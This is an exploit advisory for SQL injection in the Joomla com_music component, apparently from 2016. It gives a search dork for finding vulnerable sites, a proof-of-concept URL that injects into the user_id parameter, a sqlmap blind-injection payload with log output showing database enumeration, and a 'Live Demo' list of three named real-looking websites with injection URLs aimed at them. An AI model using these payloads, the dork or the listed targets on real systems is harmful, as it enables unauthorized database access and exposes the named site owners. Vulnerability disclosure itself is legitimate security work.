######################
# Exploit Title : Joomla com_music SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:index.php?option=com_music
# Vendor Homepage : http://www.raindropsinfotech.com/
# version : 1.0.0
# Tested on: [ Kali Linux 2.0 ]
# skype:xbadgirl21
# Date: 2016/07/15
# video Proof : https://www.youtube.com/watch?v=RNjp-FaiNiw
######################
# [+] DESCRIPTION :
######################
# [+] an SQL injection been Detected in this Joomla components music after you add ['] or ["] to
# [+] Vuln Target Parameter you will get error like :
# [+] You have an error in your SQL syntax; check the manual that corresponds to your MySQL
# [+] server version for the right syntax to use near ''' at line 1 SQL=SELECT
######################
# [+] Poc :
######################
# [user_id] Get Parameter Vulnerable To SQLi
# http://127.0.0.1/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=99999999'&lang=en
######################
# [+] SQLmap PoC:
######################
#Parameter: user_id (GET)
# Type: boolean-based blind
# Title: MySQL >= 5.0 boolean-based blind - Parameter replace
# Payload: option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=(SELECT (CASE WHEN (1963=1963) THEN 1963 ELSE 1963*(SELECT 1963 FROM #INFORMATION_SCHEMA.CHARACTER_SETS) END))&lang=en
# [14:18:22] [INFO] GET parameter 'user_id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
# [14:22:39] [INFO] the back-end DBMS is MySQL
# web application technology: Apache
# back-end DBMS: MySQL 5.0
# [14:22:39] [INFO] fetching database names
# [14:22:43] [INFO] the SQL query used returns 2 entries
######################
# [+] Live Demo :
######################
# http://saborcristiano.com/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=184'&lang=en
# http://www.radiosaborcristiano.net/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=100'&lang=en
# http://www.christianflavor.com/index.php?option=com_music&task=getUserAlbumFeeds&no_html=1&user_id=1'&lang=en
#######################
# Disclosure Timeline:
#======================
# [+]Exploit Discovered [15-07-2016]
# [+]Vendor Notified [15-07-2016]: No reply
# [+]Exploit Published [16-07-2016]
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################